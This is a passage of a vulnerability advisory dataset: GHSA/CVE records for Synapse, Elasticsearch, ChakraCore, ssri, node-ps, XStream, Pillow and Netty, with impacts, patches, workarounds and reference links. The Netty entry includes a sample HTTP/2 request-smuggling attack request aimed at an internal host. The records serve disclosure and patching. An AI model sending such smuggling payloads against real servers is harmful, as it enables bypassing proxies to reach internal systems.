'https://lists.apache.org/thread.html/raa413040db6d2197593cc03edecfd168732e697119e6447b0a25d525@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rac8cf45a1bab9ead5c9a860cbadd6faaeb7792203617b6ec3874736d@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rafc77f9f03031297394f3d372ccea751b23576f8a2ae9b6b053894c5@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rba2a9ef1d0af882ab58fadb336a58818495245dda43d32a7d7837187@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbde2f13daf4911504f0eaea43eee4f42555241b5f6d9d71564b6c5fa@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rca0978b634a0c3ebee4126ec29c7f570b165fae3f8f3658754c1cbd3@%3Cissues.kudu.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcae42fba06979934208bbd515584b241d3ad01d1bb8b063512644362@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd4a6b7dec38ea6cd28b6f94bd4b312629a52b80be3786d5fb0e474bc@%3Cissues.kudu.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd8f72411fb75b98d366400ae789966373b5c3eb3f511e717caf3e49e@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdd206d9dd7eb894cc089b37fe6edde2932de88d63a6d8368b44f5101@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdd5715f3ee5e3216d5e0083a07994f67da6dbb9731ce9e7a6389b18e@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re1911e05c08f3ec2bab85744d788773519a0afb27272a31ac2a0b4e8@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re39391adcb863f0e9f3f15e7986255948f263f02e4700b82453e7102@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re4b0141939370304d676fe23774d0c6fbc584b648919825402d0cb39@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re7c69756a102bebce8b8681882844a53e2f23975a189363e68ad0324@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re9e6ed60941da831675de2f8f733c026757fb4fa28a7b6c9f3dfb575@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/redef0fb5474fd686781007de9ddb852b24f1b04131a248d9a4789183@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf148b2bf6c2754153a8629bc7495e216bd0bd4c915695486542a10b4@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf38e4dcdefc7c59f7ba0799a399d6d6e37b555d406a1dfc2fcbf0b35@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf521ff2be2e2dd38984174d3451e6ee935c845948845c8fccd86371d@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf934292a4a1c189827f625d567838d2c1001e4739b158638d844105b@%3Cissues.kudu.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210604-0003/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4885'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-444'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-30T15:03:26Z', 'nvd_published_at': '2021-03-30T15:15:00Z'}" +1.4.0,GHSA-c5f8-35qr-q4fm,2021-08-31T21:07:06Z,2021-03-26T19:53:04Z,,['CVE-2021-21333'],HTML injection in email and account expiry notifications,"### Impact +The notification emails sent for notifications for missed messages or for an expiring account are subject to HTML injection. In the case of the notification for missed messages, this could allow an attacker to insert forged content into the email. + +The account expiry feature is not enabled by default and the HTML injection is not controllable by an attacker. + +### Patches +This issue is fixed in #9200. + +### Workarounds +For the missed messages notifications: + +The `notif.html`, `notif_mail.html`, and `room.html` templates can be overridden with custom templates that manually escapes the variables using [JInja2's `escape` filter](https://jinja.palletsprojects.com/en/2.11.x/templates/#escape). See the `email.template_dir` setting. + +For the account expiry notifications: + +1. Account expiry can be disabled via the `account_validity.enabled` setting. + +2. The `notice_expiry.html` template can be overridden with a custom template that manually escapes the variables using [JInja2's `escape` filter](https://jinja.palletsprojects.com/en/2.11.x/templates/#escape). See the `email.template_dir` setting.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'matrix-synapse'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.27.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/security/advisories/GHSA-c5f8-35qr-q4fm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21333'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/pull/9200'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/commit/e54746bdf7d5c831eabe4dcea76a7626f1de73df'}, {'type': 'PACKAGE', 'url': 'https://github.com/matrix-org/synapse'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/releases/tag/v1.27.0'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TNNAJOZNMVMXM6AS7RFFKB4QLUJ4IFEY/'}]","{'cwe_ids': ['CWE-74', 'CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-26T19:52:46Z', 'nvd_published_at': '2021-03-26T20:15:00Z'}" +1.4.0,GHSA-hwvv-438r-mhvj,2022-04-22T16:50:19Z,2021-03-18T19:23:57Z,,['CVE-2021-22134'],Exposure of Sensitive Information to an Unauthorized Actor,A document disclosure flaw was found in Elasticsearch versions after 7.6.0 and before 7.11.0 when Document or Field Level Security is used. Get requests do not properly apply security permissions when executing a query against a recently updated document. This affects documents that have been updated and not yet refreshed in the index. This could result in the search disclosing the existence of documents and fields the attacker should not be able to view.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.elasticsearch:elasticsearch'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.6.0'}, {'fixed': '7.11.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22134'}, {'type': 'WEB', 'url': 'https://discuss.elastic.co/t/elastic-stack-7-11-0-security-update/265835'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210430-0006/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}]","{'cwe_ids': ['CWE-200', 'CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-12T21:17:57Z', 'nvd_published_at': '2021-03-08T21:15:00Z'}" +1.4.0,GHSA-cwp9-956f-vcwh,2021-03-22T22:56:04Z,2021-03-29T20:57:56Z,,['CVE-2019-1141'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1131, CVE-2019-1139, CVE-2019-1140, CVE-2019-1195, CVE-2019-1196, CVE-2019-1197.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.12'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-1141'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/329d9d213e7b286349c0b156be4b5a088555de90'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/6b1250b6ffea7006226dd937e52cf5b353fcfc15'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1141'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T22:56:04Z', 'nvd_published_at': '2019-08-14T21:15:00Z'}" +1.4.0,GHSA-vx3p-948g-6vhq,2021-10-21T17:38:11Z,2021-03-19T21:24:36Z,,['CVE-2021-27290'],Regular Expression Denial of Service (ReDoS),"npm `ssri` 5.2.2-6.0.1 and 7.0.0-8.0.0, processes SRIs using a regular expression which is vulnerable to a denial of service. Malicious SRIs could take an extremely long time to process, leading to denial of service. This issue only affects consumers using the strict option.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'ssri'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.2.2'}, {'fixed': '6.0.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'ssri'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.1.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'ssri'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.0.1'}]}], 'versions': ['8.0.0']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27290'}, {'type': 'WEB', 'url': 'https://github.com/npm/ssri/pull/20#issuecomment-842677644'}, {'type': 'WEB', 'url': 'https://github.com/npm/ssri/commit/76e223317d971f19e4db8191865bdad5edee40d2'}, {'type': 'WEB', 'url': 'https://github.com/npm/ssri/commit/809c84d09ea87c3857fa171d42914586899d4538'}, {'type': 'WEB', 'url': 'https://github.com/npm/ssri/commit/b30dfdb00bb94ddc49a25a85a18fb27afafdfbb1'}, {'type': 'WEB', 'url': 'https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf'}, {'type': 'WEB', 'url': 'https://doyensec.com/resources/Doyensec_Advisory_ssri_redos.pdf'}, {'type': 'PACKAGE', 'url': 'https://github.com/npm/ssri'}, {'type': 'WEB', 'url': 'https://github.com/yetingli/SaveResults/blob/main/pdf/ssri-redos.pdf'}, {'type': 'WEB', 'url': 'https://npmjs.com'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/ssri'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-15T18:24:30Z', 'nvd_published_at': '2021-03-12T22:15:00Z'}" +1.4.0,GHSA-4rv9-5vc4-88cg,2021-03-16T00:59:16Z,2021-03-19T21:21:06Z,,['CVE-2020-7785'],Command injection in node-ps,This affects all versions of package node-ps. The injection point is located in line 72 in lib/index.js.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'node-ps'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7785'}, {'type': 'WEB', 'url': 'https://github.com/fortruce/node-ps/blob/master/lib/index.js#L72'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-NODEPS-1048335'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/node-ps'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-16T00:59:16Z', 'nvd_published_at': '2021-02-08T19:15:00Z'}" +1.4.0,GHSA-2p3x-qw9c-25hh,2022-02-08T21:33:42Z,2021-03-22T23:27:51Z,,['CVE-2021-21341'],XStream can cause a Denial of Service.,"### Impact +The vulnerability may allow a remote attacker to allocate 100% CPU time on the target system depending on CPU type or parallel execution of such a payload resulting in a denial of service only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. + +### Patches +If you rely on XStream's default blacklist of the [Security Framework](https://x-stream.github.io/security.html#framework), you will have to use at least version 1.4.16. + +### Workarounds +See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs. + +### References +See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-21341](https://x-stream.github.io/CVE-2021-21341.html). + +### Credits +The vulnerability was discovered and reported by threedr3am. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [XStream](https://github.com/x-stream/xstream/issues) +* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.thoughtworks.xstream:xstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.16'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/x-stream/xstream/security/advisories/GHSA-2p3x-qw9c-25hh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21341'}, {'type': 'PACKAGE', 'url': 'https://github.com/x-stream/xstream'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8244fd0831db894d5e89911ded9c72196d395a90ae655414d23ed0dd@%3Cusers.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9ac71b047767205aa22e3a08cb33f3e0586de6b2fac48b425c6e16b0@%3Cdev.jmeter.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00002.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210430-0002/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5004'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/CVE-2021-21341.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/security.html#workaround'}, {'type': 'WEB', 'url': 'http://x-stream.github.io/changes.html#1.4.16'}]","{'cwe_ids': ['CWE-400', 'CWE-502', 'CWE-835'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T23:23:33Z', 'nvd_published_at': '2021-03-23T00:15:00Z'}" +1.4.0,GHSA-8xjq-8fcg-g5hw,2023-09-04T16:24:09Z,2021-03-29T16:35:36Z,,['CVE-2021-25290'],Out-of-bounds Write in Pillow,"An issue was discovered in Pillow before 8.1.1. In TiffDecode.c, there is a negative-offset memcpy with an invalid size.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25290'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/commit/86f02f7c70862a0954bfe8133736d352db978eaa'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/07/msg00018.html'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/8.1.1.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202107-33'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T22:06:28Z', 'nvd_published_at': '2021-03-19T04:15:00Z'}" +1.4.0,GHSA-wm47-8v5p-wjpj,2021-08-31T21:19:12Z,2021-03-09T18:49:49Z,,['CVE-2021-21295'],Possible request smuggling in HTTP/2 due missing validation,"### Impact +If a Content-Length header is present in the original HTTP/2 request, the field is not validated by `Http2MultiplexHandler` as it is propagated up. This is fine as long as the request is not proxied through as HTTP/1.1. +If the request comes in as an HTTP/2 stream, gets converted into the HTTP/1.1 domain objects (`HttpRequest`, `HttpContent`, etc.) via `Http2StreamFrameToHttpObjectCodec `and then sent up to the child channel's pipeline and proxied through a remote peer as HTTP/1.1 this may result in request smuggling. + +In a proxy case, users may assume the content-length is validated somehow, which is not the case. If the request is forwarded to a backend channel that is a HTTP/1.1 connection, the Content-Length now has meaning and needs to be checked. + +An attacker can smuggle requests inside the body as it gets downgraded from HTTP/2 to HTTP/1.1. A sample attack request looks like: + +``` +POST / HTTP/2 +:authority:: externaldomain.com +Content-Length: 4 + +asdfGET /evilRedirect HTTP/1.1 +Host: internaldomain.com +``` + +Users are only affected if all of this is `true`: + * `HTTP2MultiplexCodec` or `Http2FrameCodec` is used + * `Http2StreamFrameToHttpObjectCodec` is used to convert to HTTP/1.1 objects + * These HTTP/1.1 objects are forwarded to another remote peer. + + +### Patches +This has been patched in 4.1.60.Final + +### Workarounds +The user can do the validation by themselves by implementing a custom `ChannelInboundHandler` that is put in the `ChannelPipeline` behind `Http2StreamFrameToHttpObjectCodec`. + +### References +Related change to workaround the problem: https://github.com/Netflix/zuul/pull/980 ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.netty:netty-codec-http2'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.1.60.Final'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jboss.netty:netty'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}], 'database_specific': {'last_known_affected_version_range': '< 4.0.0'}}, {'package': {'ecosystem': 'Maven', 'name': 'io.netty:netty'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}], 'database_specific': {'last_known_affected_version_range': '< 4.0.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21295'}, {'type': 'WEB', 'url': 'https://github.com/Netflix/zuul/pull/980'}, {'type': 'WEB', 'url': 'https://github.com/netty/netty/commit/89c241e3b1795ff257af4ad6eadc616cb2fb3dc4'}, {'type': 'PACKAGE', 'url': 'https://github.com/netty/netty'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r02e467123d45006a1dda20a38349e9c74c3a4b53e2e07be0939ecb3f@%3Cdev.ranger.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r040a5e4d9cca2f98354b58a70b27099672276f66995c4e2e39545d0b@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r04a3e0d9f53421fb946c60cc54762b7151dc692eb4e39970a7579052@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0b09f3e31e004fe583f677f7afa46bd30110904576c13c5ac818ac2c@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r15f66ada9a5faf4bac69d9e7c4521cedfefa62df9509881603791969@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r16c4b55ac82be72f28adad4f8061477e5f978199d5725691dcc82c24@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1908a34b9cc7120e5c19968a116ddbcffea5e9deb76c2be4fa461904@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1bca0b81193b74a451fc6d687ab58ef3a1f5ec40f6c61561d8dd9509@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r22adb45fe902aeafcd0a1c4db13984224a667676c323c66db3af38a1@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r22b2f34447d71c9a0ad9079b7860323d5584fb9b40eb42668c21eaf1@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r268850f26639ebe249356ed6d8edb54ee8943be6f200f770784fb190@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r27b7e5a588ec826b15f38c40be500c50073400019ce7b8adfd07fece@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2936730ef0a06e724b96539bc7eacfcd3628987c16b1b99c790e7b87@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2e93ce23e04c3f0a61e987d1111d0695cb668ac4ec4edbf237bd3e80@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r312ce5bd3c6bf08c138349b507b6f1c25fe9cf40b6f2b0014c9d12b1@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r32b0b640ad2be3b858f0af51c68a7d5c5a66a462c8bbb93699825cd3@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r33eb06b05afbc7df28d31055cae0cb3fd36cab808c884bf6d680bea5@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r393a339ab0b63ef9e6502253eeab26e7643b3e69738d5948b2b1d064@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3c293431c781696681abbfe1c573c2d9dcdae6fd3ff330ea22f0433f@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3c4596b9b37f5ae91628ccf169d33cd5a0da4b16b6c39d5bad8e03f3@%3Cdev.jackrabbit.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3ff9e735ca33612d900607dc139ebd38a64cadc6bce292e53eb86d7f@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r490ca5611c150d193b320a2608209180713b7c68e501b67b0cffb925@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4ea2f1a9d79d4fc1896e085f31fb60a21b1770d0a26a5250f849372d@%3Cissues.kudu.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5232e33a1f3b310a3e083423f736f3925ebdb150844d60ac582809f8@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5470456cf1409a99893ae9dd57439799f6dc1a60fda90e11570f66fe@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r57245853c7245baab09eae08728c52b58fd77666538092389cc3e882@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r584cf871f188c406d8bd447ff4e2fd9817fca862436c064d0951a071@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r59bac5c09f7a4179b9e2460e8f41c278aaf3b9a21cc23678eb893e41@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5baac01f9e06c40ff7aab209d5751b3b58802c63734e33324b70a06a@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5e66e286afb5506cdfe9bbf68a323e8d09614f6d1ddc806ed0224700@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5fc5786cdd640b1b0a3c643237ce0011f0a08a296b11c0e2c669022c@%3Cdev.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r602e98daacc98934f097f07f2eed6eb07c18bfc1949c8489dc7bfcf5@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r67c4f90658fde875521c949448c54c98517beecdc7f618f902c620ec@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r67e6a636cbc1958383a1cd72b7fd0cd7493360b1dd0e6c12f5761798@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6a122c25e352eb134d01e7f4fc4d345a491c5ee9453fef6fc754d15b@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6a29316d758db628a1df49ca219d64caf493999b52cc77847bfba675@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6aee7e3566cb3e51eeed2fd8786704d91f80a7581e00a787ba9f37f6@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6d32fc3cd547f7c9a288a57c7f525f5d00a00d5d163613e0d10a23ef@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r70cebada51bc6d49138272437d8a28fe971d0197334ef906b575044c@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r790c2926efcd062067eb18fde2486527596d7275381cfaff2f7b3890@%3Cissues.bookkeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7bb3cdc192e9a6f863d3ea05422f09fa1ae2b88d4663e63696ee7ef5@%3Cdev.ranger.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r837bbcbf12e335e83ab448b1bd2c1ad7e86efdc14034b23811422e6a@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r855b4b6814ac829ce2d48dd9d8138d07f33387e710de798ee92c011e@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r86cd38a825ab2344f3e6cad570528852f29a4ffdf56ab67d75c36edf@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8bcaf7821247b1836b10f6a1a3a3212b06272fd4cde4a859de1b78cf@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8db1d7b3b9acc9e8d2776395e280eb9615dd7790e1da8c57039963de@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9051e4f484a970b5566dc1870ecd9c1eb435214e2652cf3ea4d0c0cc@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r905b92099998291956eebf4f1c5d95f5a0cbcece2946cc46d32274fd@%3Cdev.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 